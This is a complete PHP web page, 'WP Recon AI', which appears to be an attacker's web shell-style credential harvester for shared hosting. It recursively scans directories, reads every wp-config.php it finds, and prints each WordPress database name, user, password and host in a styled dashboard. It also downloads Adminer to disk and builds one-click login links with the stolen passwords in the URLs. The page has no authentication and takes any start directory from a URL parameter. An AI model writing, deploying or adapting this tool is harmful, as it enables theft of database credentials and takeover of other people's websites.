<?php
// === WP Recon AI - Futuristic HUD Scanner ===

set_time_limit(0);
ini_set('memory_limit', '512M');

define('MAX_DEPTH', 10);
define('ADMINER_URL', 'https://www.adminer.org/latest.php');
define('ADMINER_FILE', __DIR__ . '/adminer.php');

// Auto-download Adminer
if (!file_exists(ADMINER_FILE)) {
    file_put_contents(ADMINER_FILE, file_get_contents(ADMINER_URL));
}

// Start Directory
$startDir = isset($_GET['start']) && !empty($_GET['start']) ? $_GET['start'] : getcwd();
if (!is_dir($startDir)) {
    $startDir = trim(shell_exec('pwd')) ?: getcwd();
}

$results = [];
$visited = [];

// Guess domain
function inferDomainFromPath($path) {
    $segments = explode('/', trim($path, '/'));
    foreach ($segments as $i => $segment) {
        if ($segment === 'domains' && isset($segments[$i + 1])) {
            return 'http://' . $segments[$i + 1];
        }
        if (strpos($segment, '.') !== false && filter_var("http://$segment", FILTER_VALIDATE_URL)) {
            return 'http://' . $segment;
        }
    }
    return 'Unknown';
}

// Recursive Scanner
function scanDirectory($dir, $depth = 0) {
    global $results, $visited;

    if ($depth > MAX_DEPTH || isset($visited[$dir]) || !is_readable($dir)) return;
    $visited[$dir] = true;

    $configFile = $dir . '/wp-config.php';
    if (file_exists($configFile)) {
        $content = file_get_contents($configFile);
        preg_match("/'DB_NAME',\s*'(.+?)'/", $content, $dbName);
        preg_match("/'DB_USER',\s*'(.+?)'/", $content, $dbUser);
        preg_match("/'DB_PASSWORD',\s*'(.+?)'/", $content, $dbPass);
        preg_match("/'DB_HOST',\s*'(.+?)'/", $content, $dbHost);

        $results[] = [
            'path'     => $configFile,
            'domain'   => inferDomainFromPath($dir),
            'db_name'  => $dbName[1] ?? 'Unknown',
            'db_user'  => $dbUser[1] ?? 'Unknown',
            'db_pass'  => $dbPass[1] ?? 'Unknown',
            'db_host'  => $dbHost[1] ?? 'Unknown',
            'adminer'  => "adminer.php?server=" . urlencode($dbHost[1] ?? '') .
                          "&username=" . urlencode($dbUser[1] ?? '') .
                          "&db=" . urlencode($dbName[1] ?? '') .
                          "&password=" . urlencode($dbPass[1] ?? '')
        ];
    }

    $items = @scandir($dir);
    if (!$items) return;

    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $next = $dir . DIRECTORY_SEPARATOR . $item;
        if (is_dir($next)) {
            scanDirectory($next, $depth + 1);
        }
    }
}

// Start scan
scanDirectory($startDir);
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>WP Recon AI - HUD Edition</title>
  <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
  <style>
    body {
      margin: 0;
      font-family: 'Share Tech Mono', monospace;
      background: radial-gradient(circle at center, #0f0f0f, #000000 70%);
      color: #00ffcc;
      overflow-x: hidden;
      padding: 2rem;
    }
    h1 {
      text-align: center;
      font-size: 2.2rem;
      color: #00ffcc;
      text-shadow: 0 0 10px #00ffcc;
    }
    .hud-container {
      display: grid;
      grid-template-columns: repeat(auto-fill, minmax(370px, 1fr));
      gap: 1.5rem;
      margin-top: 2rem;
    }
    .hud-card {
      background: rgba(0, 255, 204, 0.05);
      border: 1px solid rgba(0, 255, 204, 0.3);
      border-radius: 12px;
      padding: 1rem;
      backdrop-filter: blur(8px);
      box-shadow: 0 0 12px rgba(0, 255, 204, 0.15);
      transition: 0.3s ease;
    }
    .hud-card:hover {
      box-shadow: 0 0 25px #00ffcc;
    }
    .hud-card strong {
      color: #90ffe3;
      display: block;
      margin-bottom: 0.2rem;
    }
    .scan-form {
      text-align: center;
      margin-top: 2rem;
    }
    .scan-form input {
      padding: 0.7rem 1rem;
      background: #000;
      border: 1px solid #00ffcc;
      color: #00ffcc;
      font-family: monospace;
      border-radius: 8px;
      width: 400px;
      max-width: 100%;
    }
    .scan-form button {
      padding: 0.7rem 1.5rem;
      margin-left: 1rem;
      background: #00ffcc;
      border: none;
      font-weight: bold;
      color: #000;
      cursor: pointer;
      border-radius: 8px;
      transition: background 0.3s ease;
    }
    .scan-form button:hover {
      background: #00ccaa;
    }
    .breadcrumb {
      text-align: center;
      margin-top: 1.5rem;
      font-size: 0.95rem;
    }
    .breadcrumb a {
      color: #90ffe3;
      text-decoration: none;
    }
    .breadcrumb a:hover {
      text-decoration: underline;
    }
    .adminer-link {
      margin-top: 0.5rem;
      display: inline-block;
      padding: 0.3rem 0.6rem;
      background: #00ffcc;
      color: #000;
      border-radius: 6px;
      font-weight: bold;
      text-decoration: none;
    }
    .adminer-link:hover {
      background: #00c9a3;
    }
  </style>
</head>
<body>
  <h1>🧠 WP Recon AI — HUD Interface</h1>

  <?php
    $segments = explode('/', trim($startDir, '/'));
    $pathSoFar = '/';
    $links = [];
    foreach ($segments as $segment) {
        $pathSoFar .= $segment . '/';
        $links[] = "<a href=\"?start=" . urlencode($pathSoFar) . "\">" . htmlspecialchars($segment) . "</a>";
    }
  ?>
  <div class="breadcrumb">Scanning: <?= implode(' / ', $links) ?></div>

  <form class="scan-form" method="GET">
    <input type="text" name="start" placeholder="Start Directory (e.g. /home/user/)" />
    <button type="submit">RE-SCAN</button>
  </form>

  <div class="hud-container">
    <?php foreach ($results as $row): ?>
      <div class="hud-card">
        <strong>Path:</strong> <?= htmlspecialchars($row['path']) ?>
        <strong>Domain:</strong> <a href="<?= htmlspecialchars($row['domain']) ?>" target="_blank"><?= htmlspecialchars($row['domain']) ?></a>
        <strong>DB Name:</strong> <?= htmlspecialchars($row['db_name']) ?>
        <strong>DB User:</strong> <?= htmlspecialchars($row['db_user']) ?>
        <strong>DB Pass:</strong> <?= htmlspecialchars($row['db_pass']) ?>
        <strong>DB Host:</strong> <?= htmlspecialchars($row['db_host']) ?>
        <a class="adminer-link" href="<?= htmlspecialchars($row['adminer']) ?>" target="_blank">Open in Adminer</a>
      </div>
    <?php endforeach; ?>
  </div>
</body>
</html>
